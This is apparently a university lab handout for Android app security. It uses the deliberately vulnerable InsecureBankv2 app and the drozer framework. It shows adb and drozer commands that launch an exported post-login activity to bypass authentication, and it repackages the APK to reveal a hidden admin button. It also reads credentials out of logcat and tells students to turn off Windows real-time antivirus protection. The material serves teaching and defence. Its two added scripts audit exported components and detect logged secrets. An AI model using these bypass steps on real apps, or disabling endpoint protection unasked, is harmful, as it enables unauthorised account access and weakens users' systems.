

Coursework writing: Lab05 InsecureBankv2 01

Date: 2025-10-22  Source: hfw.cc  Author: hfw.cc


Lab05 
InsecureBankv2 01



Module Code & Title:           
Programme Code & Title:
Instructor:         
Student Name:         
Student Number:


Lab Time: dd/mm/yyyy



PLEASE BE AWARE: Do not try this lab on your personal phone. If a personal Android device is used, make a backup of the data on device.

Note: You need to submit a detailed lab report, with screenshots, to describe what you have done and what you have observed. You also need to provide explanations for the observations that are interesting or surprising. Finally, answer all questions in the lab instructions if there are any.

Task 0, Install drozer
drozer (formerly Mercury) is the leading security testing framework for Android. The website is 
https://github.com/WithSecureLabs/drozer

Option 1, install latest drozer
Follow the instructions on that page and install it with pipx:
pipx install drozer

Option 2, install drozer 2.4
The latest version of drozer supports Python 3.x; the older 2.4 series is for Python 2.x. If you only have Python 2.x, install drozer 2.4.
Download drozer-2.4.4.win32.msi and save it in the python27 folder. Ignore the warning message.
Go to Windows Security > Virus & threat protection, and under Virus & threat protection settings select Manage settings. Switch Real-time protection to Off.
Double-click the msi to install it. When asked for the Python version, choose python27.

There are two options to run drozer with python2 instead of python3:
Option 1, each time before running drozer, type (use your own path for python27):
set path=C:\Python27;C:\Python27\Scripts;%path%

Option 2, open drozer.bat under the directory C:\Python27\Scripts and replace python.exe with C:\Python27\python.exe

Back in the cmd, navigate to C:\Python27\Scripts and type:
drozer
We should see some information. Type:
drozer console connect
We should get an error. Install the missing library:
python -m pip install service_identity

After successfully installing drozer on the PC, install drozer.apk on the Android device.
Download drozer.apk from
https://labs.withsecure.com/tools/drozer
and select drozer (Agent .apk only).

Open Android Studio and start a device. Drag the apk onto the device to install it. Do not use a newer Android version; drozer does not support it.

Open drozer on the device.

Task 1, install InsecureBankv2 and tools
Step 1, install python 2.7.x.
Download and install it.
Assuming that your Python installation is in C:\Python27\, add this to your PATH: C:\Python27\;C:\Python27\Scripts\

Step 2, install pip if you have not installed it.
In the CMD, try pip:
pip --help
If it returns an error, navigate to the python directory and type:
python -m ensurepip --upgrade
Then run:
python -m pip install protobuf
python -m pip install pyopenssl
python -m pip install twisted

Step 3
InsecureBank is a purposely vulnerable app designed for educational purposes. It has a server and an apk.
https://github.com/dineshshetty/Android-InsecureBankv2
We need to launch the server so that the vulnerable app can connect to it, and we can start reversing.

Download InsecureBankv2.apk and install it in the virtual device. If adb complains that the app's target SDK version is too low, try this:
.\adb install --bypass-low-target-sdk-block InsecureBankv2.apk
Please use your own path to InsecureBankv2.apk here.

Step 4, setup AndroLab server.
The back end for the InsecureBankv2 application is a simple python server running the Flask and CherryPy web frameworks. The server component can be found in the AndroLabServer folder in the InsecureBankv2 project source folder.

Download the AndroLab source code and navigate to the AndroLab directory. To set up the AndroLab server, use pip to install the necessary requirements:
C:\Python27\python.exe -m pip install -r requirements.txt

Step 5,
Once all the requirements are installed, run the HTTP server on the default port 8888.
C:\Python27\python.exe app.py
If you encounter an “ImportError: No module named wsgiserver”, run
C:\Python27\python.exe -m pip install wsgiserver
If the same ImportError persists after that, change “from web.wsgiserver import CherryPyWSGIServer” to
from cheroot.wsgi import Server as CherryPyWSGIServer

then run the “app.py” file again to start the server.

To view the available arguments for the AndroLab server component:
python app.py --help

Step 6,
Drag the InsecureBankv2.apk file onto the emulator screen.
Alternatively, use Android Debug Bridge (ADB) to connect to the emulator and install the InsecureBankv2 APK file:
adb install InsecureBankv2.apk
Once successfully installed, the application icon appears on the emulator.

Step 7, 
Once installed, open the app.


There are pre-defined users; log in with either of them.
• dinesh/Dinesh@123$
• jack/Jack@123$
When the correct set of credentials is entered, clicking the Login button redirects us to the next screen.

Task 2
Login Vulnerabilities: Login Bypass
There are two ways to bypass login. One uses apktool to find the target activity and launches it through adb. The other uses drozer.

Option one: apk + adb
Step 1, reverse engineer the apk file.
Navigate to apktool and run
apktool d C:\{Your Path}\InsecureBankv2.apk

Step 2, 
Look at the AndroidManifest.xml file. There are four exported Activities.


Find the activity name “PostLogin”. Using ADB, we can call this exported activity.
adb shell am start -n com.android.insecurebankv2/com.android.insecurebankv2.PostLogin

This brings up an Activity that should only be available after logging in successfully, demonstrating that the login can be bypassed entirely.




Option two: drozer
Step 1, 
Run drozer on the device. The drozer agent listens on port 31415 of the device. We need a port forward so that our PC can connect to the TCP socket opened by the agent inside the emulator. By default drozer uses port 31415, so forward port 31415 on the host to port 31415 on the device:
adb forward tcp:31415 tcp:31415
Then connect drozer to the device:
.\drozer console connect
This time drozer should connect successfully, showing that it is installed and working.


Step 2,
Find the package name of the InsecureBankv2 application:
dz> run app.package.list -f bank

Determine the attack surface:
dz> run app.package.attacksurface com.android.insecurebankv2
We will find the following information:

Attack Surface:
  5 activities exported
  1 broadcast receivers exported
  1 content providers exported
  0 services exported
    is debuggable
This lists the exported activities along with the permissions needed to invoke them, i.e. activities that can be launched by other processes on the device. Let's list them:
dz> run app.activity.info -a com.android.insecurebankv2
We will find:

Package: com.android.insecurebankv2
  com.android.insecurebankv2.LoginActivity
    Permission: null
  com.android.insecurebankv2.PostLogin
    Permission: null
  com.android.insecurebankv2.DoTransfer
    Permission: null
  com.android.insecurebankv2.ViewStatement
    Permission: null
  com.android.insecurebankv2.ChangePassword
    Permission: null
There are 5 exported activities. One can guess that LoginActivity is the one launched when the application starts. Here we launch the PostLogin activity to see what happens.
dz> run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.PostLogin
Questions:
What if we launch ChangePassword? Show your screenshot.
Can an unauthenticated person access the device? What can he/she do after that?

If we want to fix this, remove the highlighted line.
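The attack-surface enumeration above, as an added Python example that is not part of the lab sheet or of the InsecureBankv2 project: it parses an apktool-decoded AndroidManifest.xml, applies Android's export rule (a component with an intent filter is exported unless android:exported says otherwise; one without is exported only if android:exported="true"), lists exported components with the permission they require (the "Permission: null" entries drozer prints), and re-runs the check after setting android:exported="false" on PostLogin, which is what the manifest fix amounts to. The sample manifest, the receiver and provider names, and DoLogin's export status are constructed for the example; only the activity names come from the drozer output above.

```python
"""Audit an apktool-decoded AndroidManifest.xml for exported components.

Added example; not code from the lab sheet or the InsecureBankv2 project.
It reproduces in plain Python what drozer's app.package.attacksurface and
app.activity.info modules report, so the manifest can be checked before and
after the fix (android:exported="false" on components that other apps must
not be able to launch).

Assumption: Android's documented default applies, i.e. a component with an
<intent-filter> is exported unless android:exported says otherwise, and a
component without one is exported only if android:exported="true".
The sample manifest below is constructed; receiver/provider names are
placeholders, and only the activity names come from the lab's drozer output.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "receiver", "provider", "service")

# Constructed sample, shaped like what `apktool d` writes out.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.insecurebankv2">
  <application android:debuggable="true">
    <activity android:name=".LoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".PostLogin" android:exported="true"/>
    <activity android:name=".DoTransfer" android:exported="true"/>
    <activity android:name=".ViewStatement" android:exported="true"/>
    <activity android:name=".ChangePassword" android:exported="true"/>
    <activity android:name=".DoLogin" android:exported="false"/>
    <receiver android:name=".PlaceholderReceiver" android:exported="true"/>
    <provider android:name=".PlaceholderProvider" android:exported="true"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute, or None if it is absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(elem):
    """Apply the android:exported / intent-filter default rule."""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return elem.find("intent-filter") is not None


def qualify(package, name):
    """Expand '.Foo' or 'Foo' to the fully qualified component name."""
    if name.startswith("."):
        return package + name
    if "." not in name:
        return package + "." + name
    return name


def attack_surface(manifest_xml):
    """Exported components per type, each with the permission it requires."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package")
    app = root.find("application")
    surface = {"package": package,
               "debuggable": _attr(app, "debuggable") == "true",
               "components": {}}
    for tag in COMPONENT_TAGS:
        surface["components"][tag] = [
            {"name": qualify(package, _attr(c, "name")),
             "permission": _attr(c, "permission")}
            for c in app.findall(tag) if is_exported(c)
        ]
    return surface


def unprotected_exported(manifest_xml, tag="activity"):
    """Exported components of one type that any app may invoke (no permission)."""
    return [c["name"] for c in attack_surface(manifest_xml)["components"][tag]
            if c["permission"] is None]


def harden(manifest_xml, component_names):
    """Return the manifest with android:exported="false" on the named components."""
    ET.register_namespace("android", ANDROID_NS)
    root = ET.fromstring(manifest_xml)
    package = root.get("package")
    for tag in COMPONENT_TAGS:
        for comp in root.find("application").findall(tag):
            if qualify(package, _attr(comp, "name")) in component_names:
                comp.set("{%s}exported" % ANDROID_NS, "false")
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    before = attack_surface(SAMPLE_MANIFEST)
    for tag, comps in before["components"].items():
        print("%d %s exported" % (len(comps), tag))
    print("is debuggable" if before["debuggable"] else "not debuggable")
    for name in unprotected_exported(SAMPLE_MANIFEST):
        print("  %s\n    Permission: null" % name)
    fixed = harden(SAMPLE_MANIFEST, {"com.android.insecurebankv2.PostLogin"})
    print("after fix:", unprotected_exported(fixed))
```

Pointing attack_surface() at the real decoded manifest (the text of InsecureBankv2/AndroidManifest.xml) gives the list to compare with the drozer output, and running it again on the edited manifest is the regression check for the fix: PostLogin drops out of the unprotected list while LoginActivity, which legitimately needs its launcher intent filter, stays.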


Task 3, Hidden Create User Button for Admins
Step 1, find the source code for the “LoginActivity”.


We will find that the login activity has a hidden button. A check is performed to determine whether a resource string called “is_admin” is set to “no”. If so, “setVisibility(8)” (the value of View.GONE) is called on the button, so it is invisible and takes no space in the layout.

Step 2, patch the vulnerability.
Since this is a string resource, the value we need to modify is in the strings.xml file under the “/res/values/” directory. Open this file, change the “is_admin” value from “no” to “yes”, then save the changes.


Step 3,
Use apktool again to rebuild the application with the now modified strings.xml file.
apktool b -f -d InsecureBankv2/
The newly generated apk is in the dist folder.

Sign it.
Find the tools zipalign and apksigner; for me they are in the folder


Uninstall the unaltered version of the application from the emulator before installing the new APK.
# install
adb install button_InsecureBankv2-final.apk
Once successfully installed, open the application and a new button called “Create user” appears.

Step 4,
However, looking at the source code of the “createUser()” method shows that the button does not actually allow us to create a user, which concludes this vulnerability.


Task 4, Insecure Logging
The “DoLogin” activity produces a debug log message whenever a user attempts to login.

These logs can be dumped using logcat. The command below shows all log messages for the application while it is running.
adb logcat | grep "$(adb shell ps | grep com.android.insecurebankv2 | awk '{print $2}')"
If we attempt to log in while logcat is running, we will see a log message containing the username and password used to log in successfully.
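A detection-side counterpart to the logcat command above, added here as an example that is not from the lab sheet or from InsecureBankv2: it parses logcat's threadtime lines, keeps only those from the app's PID, flags key=value pairs whose key names a credential, and redacts the value in the finding so the report itself does not repeat the secret. The log lines are constructed for the example; the DoLogin message only imitates what the task describes, and the PIDs and tags are made up.

```python
"""Scan captured logcat output for credential-like values.

Added example; not code from the lab sheet or InsecureBankv2. It is the check
a reviewer or a CI job would run over logcat output captured during a login
test: parse the threadtime format, restrict to the app's PID, flag key=value
pairs whose key looks like a secret, and redact the value in the finding.

Assumptions: logcat is in the default "threadtime" format
(MM-DD HH:MM:SS.mmm PID TID LEVEL TAG: message). The sample lines below are
constructed; PIDs, tags and the DoLogin message are invented for the example.
"""
import re

LOGCAT_RE = re.compile(
    r"^(?P<ts>\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})\s+"
    r"(?P<pid>\d+)\s+(?P<tid>\d+)\s+(?P<level>[VDIWEF])\s+"
    r"(?P<tag>.*?)\s*:\s(?P<msg>.*)$"
)

# Keys that should never appear with a value in an application log.
SECRET_KV_RE = re.compile(
    r"(?i)\b(?P<key>password|passwd|pwd|pin|token|secret)\s*[=:]\s*(?P<val>\S+)"
)

# Constructed sample logcat output (threadtime format); not real device output.
SAMPLE_LOGCAT = """\
10-22 10:15:01.123  4321  4321 D DoLogin : Successful Login: username=jack password=Jack@123$
10-22 10:15:01.130   812   950 I ActivityManager: Displayed com.android.insecurebankv2/.PostLogin
10-22 10:15:02.001  1200  1200 D OtherApp: password field focused
10-22 10:15:02.420  1200  1207 D OtherApp: refreshed session token=abc123
10-22 10:15:03.500  4321  4330 D DoTransfer: transfer from=123456789 to=987654321 amount=100
"""


def parse_line(line):
    """Split one threadtime logcat line into its fields, or None if it does not parse."""
    m = LOGCAT_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    rec["tid"] = int(rec["tid"])
    return rec


def redact(msg):
    """Replace every secret value with a marker, keeping the key for context."""
    return SECRET_KV_RE.sub(lambda m: "%s=<redacted>" % m.group("key"), msg)


def scan_logcat(text, pid=None):
    """Findings for lines that leak a secret; optionally limited to one PID."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # not a threadtime line (e.g. "--------- beginning of main")
        if pid is not None and rec["pid"] != pid:
            continue
        keys = [m.group("key").lower() for m in SECRET_KV_RE.finditer(rec["msg"])]
        if keys:
            findings.append({
                "pid": rec["pid"],
                "tag": rec["tag"],
                "keys": keys,
                "redacted": redact(rec["msg"]),
            })
    return findings


if __name__ == "__main__":
    # Same idea as the adb/grep pipeline in the lab: look only at the app's PID.
    for f in scan_logcat(SAMPLE_LOGCAT, pid=4321):
        print("pid=%d tag=%s leaks %s: %s" % (f["pid"], f["tag"], f["keys"], f["redacted"]))
```

Feeding it real output (`adb logcat -v threadtime -d > login.log`, then `scan_logcat(open("login.log").read(), pid=<app pid>)`) turns the manual observation in this task into a repeatable check; the fix on the app side is to drop the credential from the log statement entirely, and the redact() output shows what a log line that keeps its context but not the secret looks like.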



Examining the code carefully, we find that if the username is “devadmin”, the application does not require a password.

